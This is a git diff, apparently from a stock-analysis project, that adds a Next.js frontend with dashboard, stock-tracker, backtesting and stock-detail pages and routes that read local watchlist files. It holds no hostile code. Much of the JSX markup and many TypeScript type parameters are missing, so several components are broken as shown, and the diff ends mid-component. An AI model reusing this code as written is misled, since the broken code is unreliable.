"1.1.20", + "resolved": "https://registry.npmjs.org/which-typed-array/-/which-typed-array-1.1.20.tgz", + "integrity": "sha512-LYfpUkmqwl0h9A2HL09Mms427Q1RZWuOHsukfVcKRq9q95iQxdw0ix1JQrqbcDR9PH1QDwf5Qo8OZb5lksZ8Xg==", + "dev": true, + "license": "MIT", + "dependencies": { + "available-typed-arrays": "^1.0.7", + "call-bind": "^1.0.8", + "call-bound": "^1.0.4", + "for-each": "^0.3.5", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-tostringtag": "^1.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/word-wrap": { + "version": "1.2.5", + "resolved": "https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.5.tgz", + "integrity": "sha512-BN22B5eaMMI9UMtjrGd5g5eCYPpCPDUy0FJXbYsaT5zYxjFOckS53SQDE3pWkVoWpHXVb3BrYcEN4Twa55B5cA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/yocto-queue": { + "version": "0.1.0", + "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", + "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/zustand": { + "version": "5.0.12", + "resolved": "https://registry.npmjs.org/zustand/-/zustand-5.0.12.tgz", + "integrity": "sha512-i77ae3aZq4dhMlRhJVCYgMLKuSiZAaUPAct2AksxQ+gOtimhGMdXljRT21P5BNpeT4kXlLIckvkPM029OljD7g==", + "license": "MIT", + "engines": { + "node": ">=12.20.0" + }, + "peerDependencies": { + "@types/react": ">=18.0.0", + "immer": ">=9.0.6", + "react": ">=18.0.0", + "use-sync-external-store": ">=1.2.0" + }, + "peerDependenciesMeta": { + "@types/react": { + "optional": true + }, + "immer": { + "optional": true + }, + "react": { + "optional": true + }, + "use-sync-external-store": { + "optional": true + } + } + } + } +} diff --git a/frontend/package.json b/frontend/package.json new file mode 100644 index 0000000..117847b --- /dev/null +++ b/frontend/package.json @@ -0,0 +1,28 @@ +{ + "name": "tradingagents-frontend", + "version": "0.1.0", + "private": true, + "scripts": { + "dev": "next dev -p 3000", + "build": "next build", + "start": "next start -p 3000", + "lint": "next lint" + }, + "dependencies": { + "next": "^15.2.0", + "react": "^19.0.0", + "react-dom": "^19.0.0", + "zustand": "^5.0.3" + }, + "devDependencies": { + "@tailwindcss/postcss": "^4.1.4", + "@types/node": "^22.13.0", + "@types/react": "^19.0.10", + "@types/react-dom": "^19.0.4", + "eslint": "^9.20.1", + "eslint-config-next": "^15.2.0", + "tailwindcss": "^4.1.4", + "typescript": "^5.8.2" + } +} + diff --git a/frontend/postcss.config.mjs b/frontend/postcss.config.mjs new file mode 100644 index 0000000..fa4a1da --- /dev/null +++ b/frontend/postcss.config.mjs @@ -0,0 +1,6 @@ +export default { + plugins: { + "@tailwindcss/postcss": {}, + }, +}; + diff --git a/frontend/src/app/analysis/page.tsx b/frontend/src/app/analysis/page.tsx new file mode 100644 index 0000000..e75055d --- /dev/null +++ b/frontend/src/app/analysis/page.tsx @@ -0,0 +1,293 @@ +"use client"; + +import { useEffect, useRef, useState } from "react"; +import { useRouter } from "next/navigation"; +import { + getStockTrackerLatest, + refreshStockTracker, + getStockTrackerJob, + type StockTrackerItem, + type StockTrackerLatest, +} from "@/lib/api"; + +// ─── 工具函数 ───────────────────────────────────────────────────────────────── + +function fmt(v: number | null | undefined, digits = 2, suffix = ""): string { + if (v == null) return "—"; + return v.toFixed(digits) + suffix; +} + +function fmtPct(v: number | null | undefined): string { + if (v == null) return "—"; + return (v >= 0 ? "+" : "") + v.toFixed(2) + "%"; +} + +function fmtPctColor(v: number | null | undefined): string { + if (v == null) return "text-[#8d90a2]"; + return v >= 0 ? "text-[#22c55e]" : "text-[#f87171]"; +} + +function stageColor(label: string | undefined): string { + if (!label) return "bg-[#2B2F36] text-[#8d90a2]"; + if (label.includes("Stage 2")) return "bg-[#1a3a20] text-[#4ade80]"; + if (label.includes("Stage 1")) return "bg-[#1a2e3a] text-[#60a5fa]"; + if (label.includes("Stage 3")) return "bg-[#3a2a10] text-[#fbbf24]"; + if (label.includes("Stage 4")) return "bg-[#3a1a1a] text-[#f87171]"; + return "bg-[#2B2F36] text-[#8d90a2]"; +} + +function scoreBar(score: number | null | undefined): string { + if (score == null) return "—"; + const filled = Math.round(score); + return "█".repeat(filled) + "░".repeat(Math.max(0, 9 - filled)); +} + +// ─── 主组件 ────────────────────────────────────────────────────────────────── + +export default function AnalysisPage() { + const router = useRouter(); + const [data, setData] = useState(null); + const [loading, setLoading] = useState(true); + const [error, setError] = useState(null); + const [refreshing, setRefreshing] = useState(false); + const [refreshProgress, setRefreshProgress] = useState(""); + const pollRef = useRef | null>(null); + + useEffect(() => { + loadLatest(); + return () => { + if (pollRef.current) clearInterval(pollRef.current); + }; + }, []); + + async function loadLatest() { + setLoading(true); + setError(null); + try { + const d = await getStockTrackerLatest(); + setData(d); + } catch (e) { + setError(String(e)); + } finally { + setLoading(false); + } + } + + async function handleRefresh() { + if (refreshing) return; + setRefreshing(true); + setRefreshProgress("启动刷新..."); + try { + const job = await refreshStockTracker(); + pollJob(job.job_id); + } catch (e) { + setRefreshing(false); + setRefreshProgress(""); + setError(String(e)); + } + } + + function pollJob(jobId: string) { + if (pollRef.current) clearInterval(pollRef.current); + pollRef.current = setInterval(async () => { + try { + const job = await getStockTrackerJob(jobId); + setRefreshProgress(job.progress ? `处理中:${job.progress}` : job.status); + if (job.status === "completed") { + clearInterval(pollRef.current!); + setRefreshing(false); + setRefreshProgress(""); + await loadLatest(); + } else if (job.status === "failed") { + clearInterval(pollRef.current!); + setRefreshing(false); + setRefreshProgress(""); + setError(job.error ?? "刷新失败"); + } + } catch { + clearInterval(pollRef.current!); + setRefreshing(false); + } + }, 2000); + } + + const tickers = data?.tickers ?? []; + + return ( +
+ {/* ─── 顶部控制栏 ─────────────────────────────────────────────────────── */} +
+
+ 个股追踪 + {data?.updated_at && ( + + 更新:{new Date(data.updated_at).toLocaleString("zh-CN", { timeZone: "Asia/Shanghai" })} + + )} + {refreshing && ( + {refreshProgress} + )} +
+ +
+ + {/* ─── 主体内容 ─────────────────────────────────────────────────────── */} +
+ {loading && ( +
加载中...
+ )} + {error && ( +
+ {error} +
+ )} + + {!loading && tickers.length === 0 && ( +
+ 暂无数据,请点击「刷新数据」加载核心 13 只追踪指标。 +
+ )} + + {tickers.length > 0 && ( +
+ {/* ─── 表头 ──────────────────────────────────────────────────── */} +
+ # + Ticker + 收盘价 + 涨跌幅 + PE(TTM) + 行业PE + 偏离MA150 + MA150斜率 + RS 3M + Stage + 买点类型 + 评分 +
+ + {/* ─── 数据行 ─────────────────────────────────────────────────── */} +
+ {tickers.map((item, idx) => ( + router.push(`/stock-detail?ticker=${item.ticker}`)} + /> + ))} +
+
+ )} +
+
+ ); +} + +// ─── 单行组件 ───────────────────────────────────────────────────────────────── + +function TickerRow({ + item, + rank, + onClick, +}: { + item: StockTrackerItem; + rank: number; + onClick: () => void; +}) { + const tech = item.technical ?? {}; + const fund = item.fundamental ?? {}; + const llm = item.llm ?? {}; + + const peRatio = + fund.pe_ttm != null && fund.industry_pe_avg != null && fund.industry_pe_avg > 0 + ? fund.pe_ttm / fund.industry_pe_avg + : null; + const peRatioColor = + peRatio == null + ? "text-[#a8acc0]" + : peRatio > 1.5 + ? "text-[#fbbf24]" + : peRatio < 0.8 + ? "text-[#4ade80]" + : "text-[#e8eaf0]"; + + return ( +
+ {/* # */} + {rank} + + {/* Ticker + name */} +
+
{item.ticker}
+
{item.name}
+
+ + {/* 收盘价 */} + + {tech.close != null ? `$${tech.close.toFixed(2)}` : "—"} + + + {/* 涨跌幅 */} + + {fmtPct(tech.change_pct)} + + + {/* PE TTM */} + + {fund.pe_ttm != null ? fund.pe_ttm.toFixed(1) + "x" : "—"} + + + {/* 行业PE */} + + {fund.industry_pe_avg != null ? fund.industry_pe_avg.toFixed(1) + "x" : "—"} + + + {/* 偏离MA150 */} + + {fmtPct(tech.pct_vs_ma150)} + + + {/* MA150斜率 */} + + {fmtPct(tech.ma150_slope_4w)} + + + {/* RS 3M */} + + {tech.rs_slope_3m != null ? (tech.rs_slope_3m >= 0 ? "+" : "") + tech.rs_slope_3m.toFixed(3) : "—"} + + + {/* Stage */} + + {llm.stage_label || "待分析"} + + + {/* 买点类型 */} + + {llm.action_type || "待分析"} + + + {/* 评分 */} + + {tech.score != null ? `${tech.score}/9` : "—"} + +
+ ); +} diff --git a/frontend/src/app/api-health/page.tsx b/frontend/src/app/api-health/page.tsx new file mode 100644 index 0000000..171ba5c --- /dev/null +++ b/frontend/src/app/api-health/page.tsx @@ -0,0 +1,25 @@ +"use client"; + +import { useEffect, useState } from "react"; + +export default function ApiHealthPage() { + const [health, setHealth] = useState("checking"); + useEffect(() => { + const apiBase = process.env.NEXT_PUBLIC_API_BASE?.trim(); + if (!apiBase) { + setHealth("missing NEXT_PUBLIC_API_BASE"); + return; + } + fetch(`${apiBase}/health`) + .then((r) => r.json()) + .then(() => setHealth("ok")) + .catch(() => setHealth("failed")); + }, []); + return ( +
+

API 健康检查

+

后端状态:{health}

+
+ ); +} + diff --git a/frontend/src/app/api/follows/ai-compute/route.ts b/frontend/src/app/api/follows/ai-compute/route.ts new file mode 100644 index 0000000..cb821cc --- /dev/null +++ b/frontend/src/app/api/follows/ai-compute/route.ts @@ -0,0 +1,52 @@ +import { NextResponse } from "next/server"; +import { promises as fs } from "fs"; +import path from "path"; + +type AiComputeTicker = { + ticker: string; + name?: string; + rank?: number; + layer?: string; + reason?: string; + action?: string; +}; + +type AiComputeGroup = { + id: string; + label: string; + order: number; + description?: string; + focus?: string; + merged_from?: string[]; + tickers: AiComputeTicker[]; +}; + +type AiComputeWatchlist = { + schema_version: string; + name: string; + source_doc?: string; + updated_at?: string; + priority_legend?: Record; + groups: AiComputeGroup[]; +}; + +export async function GET() { + try { + // 由 frontend/ 起向上一级取仓库根,统一指向 data/follows/ai_compute_watchlist.json。 + const filePath = path.resolve( + process.cwd(), + "../data/follows/ai_compute_watchlist.json", + ); + const raw = await fs.readFile(filePath, "utf-8"); + const data = JSON.parse(raw) as AiComputeWatchlist; + data.groups = [...(data.groups ?? [])].sort( + (a, b) => (a.order ?? 0) - (b.order ?? 0), + ); + return NextResponse.json(data); + } catch (err) { + return NextResponse.json( + { groups: [] as AiComputeGroup[], error: String(err) }, + { status: 200 }, + ); + } +} diff --git a/frontend/src/app/api/follows/source/route.ts b/frontend/src/app/api/follows/source/route.ts new file mode 100644 index 0000000..30f63bd --- /dev/null +++ b/frontend/src/app/api/follows/source/route.ts @@ -0,0 +1,38 @@ +import { NextResponse } from "next/server"; +import { promises as fs } from "fs"; +import path from "path"; + +type FutuWatchlistRow = { + group_name: string; + code: string; + name: string; +}; + +export async function GET() { + try { + const scriptsDir = path.resolve(process.cwd(), "../scripts"); + const files = await fs.readdir(scriptsDir); + const candidates = files + .filter((f) => /^futu_watchlist_full_.*\.json$/i.test(f)) + .sort((a, b) => b.localeCompare(a)); + + if (candidates.length === 0) { + return NextResponse.json([] as FutuWatchlistRow[]); + } + + const latest = candidates[0]; + const fullPath = path.join(scriptsDir, latest); + const raw = await fs.readFile(fullPath, "utf-8"); + const parsed = JSON.parse(raw) as Array>; + + const rows: FutuWatchlistRow[] = parsed.map((x) => ({ + group_name: String(x.group_name ?? ""), + code: String(x.code ?? ""), + name: String(x.name ?? ""), + })); + return NextResponse.json(rows); + } catch { + return NextResponse.json([] as FutuWatchlistRow[]); + } +} + diff --git a/frontend/src/app/backtesting/page.tsx b/frontend/src/app/backtesting/page.tsx new file mode 100644 index 0000000..d1b26ff --- /dev/null +++ b/frontend/src/app/backtesting/page.tsx @@ -0,0 +1,78 @@ +"use client"; + +import { useEffect, useState } from "react"; +import { createBacktestJob, getBacktestJob, getBacktestPeriods } from "@/lib/api"; + +type PeriodItem = { key: string; label: string }; + +export default function BacktestingPage() { + const [periods, setPeriods] = useState([]); + const [periodKey, setPeriodKey] = useState("2y"); + const [jobId, setJobId] = useState(""); + const [status, setStatus] = useState(""); + const [result, setResult] = useState(null); + const [error, setError] = useState(""); + + useEffect(() => { + getBacktestPeriods().then((res) => { + setPeriods(res); + if (res.length > 0) setPeriodKey(res[0].key); + }); + }, []); + + async function runBacktest() { + setError(""); + setResult(null); + const job = await createBacktestJob(periodKey); + setJobId(job.job_id); + setStatus(job.status); + } + + async function refreshJob() { + if (!jobId) return; + const job = await getBacktestJob(jobId); + setStatus(job.status); + setResult(job.result ?? null); + setError(job.error ?? ""); + } + + return ( +
+

回测执行终端

+
+
回测周期
+ +
+ + +
+
+ +
+

任务状态面板

+
+ {`job_id: ${jobId || "-"} +status: ${status || "-"} +error: ${error || "none"}`} +
+ {error &&
错误:{error}
} +
+ + {result !== null && ( +
+

结果快照

+
{JSON.stringify(result, null, 2)}
+
+ )} +
+ ); +} + diff --git a/frontend/src/app/globals.css b/frontend/src/app/globals.css new file mode 100644 index 0000000..a6db262 --- /dev/null +++ b/frontend/src/app/globals.css @@ -0,0 +1,23 @@ +@import "tailwindcss"; + +body { + background-color: #0b0e11; + color: #e1e2e7; + font-family: "Inter", -apple-system, BlinkMacSystemFont, "Segoe UI", sans-serif; +} + +.material-symbols-outlined { + font-variation-settings: "FILL" 0, "wght" 400, "GRAD" 0, "opsz" 24; +} + +.custom-scrollbar::-webkit-scrollbar { + width: 4px; +} + +.custom-scrollbar::-webkit-scrollbar-track { + background: #111417; +} + +.custom-scrollbar::-webkit-scrollbar-thumb { + background: #2b2f36; +} diff --git a/frontend/src/app/layout.tsx b/frontend/src/app/layout.tsx new file mode 100644 index 0000000..f7ad579 --- /dev/null +++ b/frontend/src/app/layout.tsx @@ -0,0 +1,52 @@ +import "./globals.css"; +import type { ReactNode } from "react"; +import { Suspense } from "react"; +import { NavSidebar } from "@/components/nav-sidebar"; + +export default function RootLayout({ children }: { children: ReactNode }) { + return ( + + + + + + + + +
+ +
+ {children} +
+
+ + + ); +} + diff --git a/frontend/src/app/page.tsx b/frontend/src/app/page.tsx new file mode 100644 index 0000000..0e387e0 --- /dev/null +++ b/frontend/src/app/page.tsx @@ -0,0 +1,480 @@ +"use client"; + +import { useEffect, useState } from "react"; +import { BatchQuote, DashboardSnapshot, getBatchQuotes, getDashboard, getDefaultState, refreshDashboard } from "@/lib/api"; +import { useUiStore } from "@/store/uiStore"; + +type FollowsTab = "watchlist" | "positions"; + +type FollowRow = { + ticker: string; + note: string; + sourceCode?: string; + rank?: number; + layer?: string; + reason?: string; + action?: string; +}; + +type AiComputeTicker = { + ticker: string; + name?: string; + rank?: number; + layer?: string; + reason?: string; + action?: string; +}; + +type AiComputeGroup = { + id: string; + label: string; + order: number; + description?: string; + focus?: string; + tickers: AiComputeTicker[]; +}; + +type AiComputeWatchlist = { + groups: AiComputeGroup[]; +}; + +export default function DashboardPage() { + const hydrate = useUiStore((s) => s.hydrateFromApi); + const [loading, setLoading] = useState(true); + const [refreshing, setRefreshing] = useState(false); + const [err, setErr] = useState(""); + const [snapshot, setSnapshot] = useState(null); + const [followsTab, setFollowsTab] = useState("watchlist"); + const [watchlistRows, setWatchlistRows] = useState([]); + const [watchlistByGroup, setWatchlistByGroup] = useState>({}); + const [watchlistGroups, setWatchlistGroups] = useState([]); + const [activeWatchlistGroup, setActiveWatchlistGroup] = useState(""); + const [positionsRows, setPositionsRows] = useState([]); + const [followsQuoteMap, setFollowsQuoteMap] = useState>({}); + + useEffect(() => { + Promise.all([getDefaultState(), getDashboard()]) + .then(([state, dash]) => { + hydrate(state); + setSnapshot(dash); + }) + .catch((e) => setErr(String(e))) + .finally(() => setLoading(false)); + }, [hydrate]); + + useEffect(() => { + const savedWatch = localStorage.getItem("ta_follows_watchlist"); + const savedPos = localStorage.getItem("ta_follows_positions"); + const savedQuotes = localStorage.getItem("ta_follows_quotes"); + const defaults: FollowRow[] = [ + { ticker: "QQQ", note: "纳指ETF" }, + { ticker: "TQQQ", note: "三倍做多纳指" }, + { ticker: "SOXX", note: "半导体ETF" }, + { ticker: "SPY", note: "标普ETF" }, + { ticker: "NVDA", note: "AI龙头" }, + { ticker: "AAPL", note: "权重股" }, + ]; + setWatchlistRows(savedWatch ? (JSON.parse(savedWatch) as FollowRow[]) : defaults); + setPositionsRows(savedPos ? (JSON.parse(savedPos) as FollowRow[]) : []); + setFollowsQuoteMap(savedQuotes ? (JSON.parse(savedQuotes) as Record) : {}); + }, []); + + useEffect(() => { + fetch("/api/follows/ai-compute") + .then((r) => (r.ok ? r.json() : Promise.reject(new Error(`HTTP ${r.status}`)))) + .then((data: AiComputeWatchlist) => { + const groups = [...(data.groups ?? [])].sort( + (a, b) => (a.order ?? 0) - (b.order ?? 0), + ); + if (groups.length === 0) return; + const grouped: Record = {}; + const labels: string[] = []; + groups.forEach((g) => { + const rows: FollowRow[] = (g.tickers ?? []).map((t) => ({ + ticker: t.ticker.toUpperCase(), + note: t.name || t.ticker, + sourceCode: t.ticker.toUpperCase(), + rank: t.rank, + layer: t.layer, + reason: t.reason, + action: t.action, + })); + if (rows.length === 0) return; + grouped[g.label] = rows; + labels.push(g.label); + }); + setWatchlistByGroup(grouped); + setWatchlistGroups(labels); + setActiveWatchlistGroup((prev) => (prev && grouped[prev] ? prev : labels[0])); + }) + .catch(() => { + // 保留本地默认 watchlist,避免 API 未就绪时页面报错 + }); + }, []); + + async function onRefreshMarket() { + setRefreshing(true); + setErr(""); + try { + const dash = await refreshDashboard(10); + setSnapshot(dash); + const allRows = [ + ...watchlistRows, + ...Object.values(watchlistByGroup).flat(), + ...positionsRows, + ]; + const queryCodes = Array.from( + new Set(allRows.map((x) => (x.sourceCode || x.ticker || "").toUpperCase()).filter(Boolean)), + ).slice(0, 200); + if (queryCodes.length > 0) { + const rows = await getBatchQuotes(queryCodes); + const m: Record = {}; + rows.forEach((q) => { + m[(q.request_code || "").toUpperCase()] = q; + m[(q.normalized_code || "").toUpperCase()] = q; + }); + setFollowsQuoteMap(m); + localStorage.setItem("ta_follows_quotes", JSON.stringify(m)); + } + } catch (e) { + setErr(String(e)); + } finally { + setRefreshing(false); + } + } + + function pct(value: number | null | undefined): string { + if (value === null || value === undefined) return "-"; + return `${value >= 0 ? "+" : ""}${value.toFixed(2)}%`; + } + + function num(value: number | null | undefined): string { + if (value === null || value === undefined) return "N/A"; + return value.toFixed(2); + } + + function clsByPct(value: number | null | undefined): string { + if (value === null || value === undefined) return "text-[#c3c5d8]"; + if (value < 0) return "text-[#ffb3b0]"; + return "text-[#44e092]"; + } + + function heatBgByPct(value: number | null | undefined): string { + if (value === null || value === undefined) return "bg-[#111417]"; + if (value < 0) return "bg-[#da2237]/12"; + return "bg-[#03c177]/12"; + } + + function stanceMeta(stance: string | undefined): { label: string; cls: string } { + if (stance === "bullish") return { label: "看多", cls: "border-[#03c177]/50 bg-[#03c177]/15 text-[#66fdac]" }; + if (stance === "bearish") return { label: "看空", cls: "border-[#da2237]/50 bg-[#da2237]/15 text-[#ffb3b0]" }; + return { label: "中性", cls: "border-[#434656] bg-[#272a2e] text-[#c3c5d8]" }; + } + + const digestText = snapshot?.market_digest_md?.trim() || "暂无总结内容"; + const digestLines = digestText.split("\n").filter(Boolean); + const heatmapCards = (snapshot?.top6_sectors ?? []) + .map((x) => ({ + key: `sector-${x.ticker}`, + name: x.ticker, + price: x.price, + change_pct: x.change_pct, + })) + .sort((a, b) => (b.change_pct ?? -Infinity) - (a.change_pct ?? -Infinity)) + .slice(0, 6); + + function onImportFutuCsv(file: File) { + const reader = new FileReader(); + reader.onload = () => { + const text = String(reader.result || ""); + const lines = text + .split(/\r?\n/) + .map((x) => x.trim()) + .filter(Boolean); + if (lines.length < 2) return; + const delimiter = lines[0].includes("\t") ? "\t" : ","; + const headers = lines[0].split(delimiter).map((x) => x.trim().toLowerCase()); + const codeIdx = headers.findIndex((h) => ["code", "ticker", "symbol", "代码", "股票代码"].includes(h)); + const nameIdx = headers.findIndex((h) => ["name", "名称", "股票名称"].includes(h)); + const rows: FollowRow[] = lines.slice(1).map((line) => { + const cols = line.split(delimiter).map((x) => x.trim()); + const ticker = (codeIdx >= 0 ? cols[codeIdx] : cols[0] || "").toUpperCase(); + const note = nameIdx >= 0 ? cols[nameIdx] || "富途导入" : "富途导入"; + return { ticker, note, sourceCode: ticker }; + }); + const cleaned = rows.filter((r) => r.ticker.length > 0); + setPositionsRows(cleaned); + localStorage.setItem("ta_follows_positions", JSON.stringify(cleaned)); + setFollowsTab("positions"); + }; + reader.readAsText(file, "utf-8"); + } + + const displayedRows = + followsTab === "watchlist" + ? watchlistGroups.length > 0 && activeWatchlistGroup + ? watchlistByGroup[activeWatchlistGroup] ?? [] + : watchlistRows + : positionsRows; + + return ( +
+
+
+
+

Sector Strength Heatmap

+ grid_view +
+
+ {heatmapCards.map((x) => ( +
+ {x.name} + {num(x.price)} + {pct(x.change_pct)} +
+ ))} +
+
+ +
+
+

Macro Index

+
+
+ {(snapshot?.macro_strip ?? []).map((m) => ( +
+
+
{m.ticker}
+
{m.label}
+
+ {m.display_value ?? "N/A"} + + {pct(m.change_pct ?? null)} + +
+ ))} +
+
+ {(snapshot?.indexes ?? []).map((x) => ( +
+
+
{x.ticker}
+
{x.label}
+
+ {num(x.price)} + {pct(x.change_pct)} +
+ ))} + {loading &&
[SYNC] loading market snapshot...
} + {err &&
{err}
} +
+
+
+ +
+
+
+ bolt +

LLM Alpha Summary

+
+
+ {digestLines.length === 0 &&

暂无总结内容

} + {digestLines.map((line, idx) => { + const t = line.trim(); + if (t.startsWith("#####")) { + return ( +

+ {t.replace(/^#####\s*/, "")} +

+ ); + } + if (t.startsWith("-")) { + return ( +

+ {t} +

+ ); + } + return ( +

+ {t} +

+ ); + })} +
+
+ + {snapshot?.market_status || "MARKET"} + + + {snapshot?.last_updated_et || "N/A"} + + +
+
+ +
+
+

Real-time News Feed

+
+ + Live Stream +
+
+
+ {(snapshot?.news ?? []).slice(0, 10).map((n, i) => ( +
+
{n.published_at?.slice(11, 16) || "--:--"}
+
+

{n.title}

+
+ {(() => { + const meta = stanceMeta(n.stance); + return ( + + {meta.label} + + ); + })()} +
+ {n.llm_summary &&

{n.llm_summary}

} +
+
+ ))} +
+
+
+ +
+
+
+

Follows

+
+
+ + +
+ +
+
+
+
名称代码
+
最新价
+
涨跌额
+
涨跌幅
+
+
+ {followsTab === "watchlist" && watchlistGroups.length > 0 && ( +
+ {watchlistGroups.map((g) => ( + + ))} +
+ )} + {displayedRows.map((f) => { + const mapHit = followsQuoteMap[(f.sourceCode || f.ticker).toUpperCase()] || followsQuoteMap[f.ticker.toUpperCase()]; + const hit = + mapHit || + (snapshot?.indexes ?? []).find((x) => x.ticker === f.ticker) || + (snapshot?.top6_sectors ?? []).find((x) => x.ticker === f.ticker); + const tooltipParts = [ + f.layer ? `层级: ${f.layer}` : "", + f.reason ? `加入理由: ${f.reason}` : "", + f.action ? `当前动作: ${f.action}` : "", + ].filter(Boolean); + const tooltip = tooltipParts.join("\n"); + return ( +
+
+
+ {f.rank !== undefined && ( + #{f.rank} + )} + {f.note} +
+
{f.ticker}
+
+
{num(hit?.price)}
+
+ {hit?.change === null || hit?.change === undefined ? "-" : `${hit.change >= 0 ? "+" : ""}${hit.change.toFixed(2)}`} +
+
+ {pct(hit?.change_pct)} +
+
+ ); + })} + {followsTab === "positions" && positionsRows.length === 0 && ( +
暂无持仓,点击右上角“富途导入”导入 CSV。
+ )} +
+
+ +
+
+

NPM Runtime Logs

+
+
+
[npm] next dev -p 3000
+
[ready] dev server running
+
[api] GET /api/v1/dashboard
+
[api] POST /api/v1/dashboard/refresh
+ {refreshing ?
[refresh] market data updating...
:
[refresh] idle
} + {err ?
[error] {err}
:
[status] no runtime error
} +
+
+
+
+ ); +} + diff --git a/frontend/src/app/portfolio/page.tsx b/frontend/src/app/portfolio/page.tsx new file mode 100644 index 0000000..f8a98df --- /dev/null +++ b/frontend/src/app/portfolio/page.tsx @@ -0,0 +1,9 @@ +export default function PortfolioPage() { + return ( +
+

持仓

+

页面骨架已迁移,后续对接持仓和资金查询 API。

+
+ ); +} + diff --git a/frontend/src/app/screener/page.tsx b/frontend/src/app/screener/page.tsx new file mode 100644 index 0000000..6cf3b42 --- /dev/null +++ b/frontend/src/app/screener/page.tsx @@ -0,0 +1,6 @@ +import { redirect } from "next/navigation"; + +export default function ScreenerPage() { + redirect("/x-brief"); +} + diff --git a/frontend/src/app/stock-detail/page.tsx b/frontend/src/app/stock-detail/page.tsx new file mode 100644 index 0000000..5f739cc --- /dev/null +++ b/frontend/src/app/stock-detail/page.tsx @@ -0,0 +1,719 @@ +"use client"; + +import { useEffect, useState, useCallback, Suspense } from "react"; +import { useRouter, useSearchParams } from "next/navigation"; +import { + getStockTrackerLatest, + getStockTrackerChartUrl, + type StockTrackerItem, + type StockTechnical, + type StockFundamental, + type StockLlm, + type EpsHistoryItem, + type QuarterlyRevenueItem, + type AnalystBreakdown, +} from "@/lib/api"; + +// ─── 工具函数 ───────────────────────────────────────────────────────────────── + +function fmt(v: number | null | undefined, digits = 2): string { + if (v == null) return "—"; + return v.toFixed(digits); +} + +function toNum(v: unknown): number | null { + if (v == null || v === "") return null; + const n = typeof v === "number" ? v : Number(v); + return Number.isFinite(n) ? n : null; +} + +function fmtPct(v: number | null | undefined, alwaysSign = true): string { + if (v == null) return "—"; + const sign = alwaysSign ? (v >= 0 ? "+" : "") : ""; + return sign + v.toFixed(2) + "%"; +} + +function fmtMarketCap(v: number | null | undefined): string { + if (v == null) return "—"; + if (v >= 1e12) return "$" + (v / 1e12).toFixed(2) + "T"; + if (v >= 1e9) return "$" + (v / 1e9).toFixed(1) + "B"; + if (v >= 1e6) return "$" + (v / 1e6).toFixed(0) + "M"; + return "$" + v.toFixed(0); +} + +function fmtFreeCashflow(v: number | null | undefined): string { + if (v == null) return "—"; + if (Math.abs(v) >= 1e9) return "$" + (v / 1e9).toFixed(1) + "B"; + if (Math.abs(v) >= 1e6) return "$" + (v / 1e6).toFixed(0) + "M"; + return "$" + v.toFixed(0); +} + +function colorVal(v: number | null | undefined): string { + if (v == null) return "text-[#e8eaf0]"; + return v >= 0 ? "text-[#22c55e]" : "text-[#f87171]"; +} + +function stageColor(label: string | undefined): string { + if (!label || label === "待分析") return "bg-[#2B2F36] text-[#8d90a2]"; + if (label.includes("Stage 2")) return "bg-[#1a3a20] text-[#4ade80]"; + if (label.includes("Stage 1")) return "bg-[#1a2e3a] text-[#60a5fa]"; + if (label.includes("Stage 3")) return "bg-[#3a2a10] text-[#fbbf24]"; + if (label.includes("Stage 4")) return "bg-[#3a1a1a] text-[#f87171]"; + return "bg-[#2B2F36] text-[#8d90a2]"; +} + +function confidenceColor(c: string | undefined): string { + if (c === "high") return "text-[#22c55e]"; + if (c === "medium") return "text-[#fbbf24]"; + if (c === "low") return "text-[#f87171]"; + return "text-[#8d90a2]"; +} + +// ─── 小指标行 ───────────────────────────────────────────────────────────────── + +function Row({ + label, + value, + valueClass = "text-white", + hint, +}: { + label: string; + value: React.ReactNode; + valueClass?: string; + hint?: string; +}) { + return ( +
+ + {label} + + + {value} + +
+ ); +} + +// ─── 中卡片 ────────────────────────────────────────────────────────────────── + +function MedCard({ + title, + children, + fullWidth = false, +}: { + title: string; + children: React.ReactNode; + fullWidth?: boolean; +}) { + return ( +
+
+ {title} +
+ {children} +
+ ); +} + +// ─── 大模块(accordion) ────────────────────────────────────────────────────── + +function Module({ + title, + summary, + children, + defaultOpen = true, +}: { + title: string; + summary: string; + children: React.ReactNode; + defaultOpen?: boolean; +}) { + const [open, setOpen] = useState(defaultOpen); + + return ( +
+ {/* 大模块 header */} + + + {/* 折叠内容(响应式 grid:移动端 1 列 / md 2 列 / xl 3 列) */} + {open && ( +
+
{children}
+
+ )} +
+ ); +} + +// ─── EPS 历史 ───────────────────────────────────────────────────────────────── + +function EpsHistoryRows({ items }: { items: EpsHistoryItem[] }) { + if (!items || items.length === 0) + return
暂无数据
; + return ( +
+ {items.map((e, i) => ( +
+ {e.date ?? `Q${i + 1}`} + + {e.surprise_pct != null ? ( + = 0 ? "text-[#4ade80]" : "text-[#f87171]"}> + {e.surprise_pct >= 0 ? "+" : ""} + {e.surprise_pct.toFixed(1)}% {e.surprise_pct >= 0 ? "✅" : "❌"} + + ) : ( + + )} + +
+ ))} +
+ ); +} + +// ─── 季度营收 ───────────────────────────────────────────────────────────────── + +function QuarterlyRevenueRows({ items }: { items: QuarterlyRevenueItem[] }) { + if (!items || items.length === 0) + return
暂无数据
; + return ( +
+ {items.map((r, i) => ( +
+ {r.date ?? `Q${i + 1}`} + + {r.revenue != null ? ( + + {r.revenue >= 1e9 + ? "$" + (r.revenue / 1e9).toFixed(2) + "B" + : "$" + (r.revenue / 1e6).toFixed(0) + "M"} + + ) : ( + "—" + )} + {r.qoq_pct != null && ( + = 0 ? "text-[#4ade80]" : "text-[#f87171]" + }`} + > + {r.qoq_pct >= 0 ? "+" : ""} + {r.qoq_pct.toFixed(1)}% + + )} + +
+ ))} +
+ ); +} + +// ─── 分析师买卖分布 bar ──────────────────────────────────────────────────────── + +function AnalystBar({ b }: { b: AnalystBreakdown | null }) { + if (!b) return
暂无数据
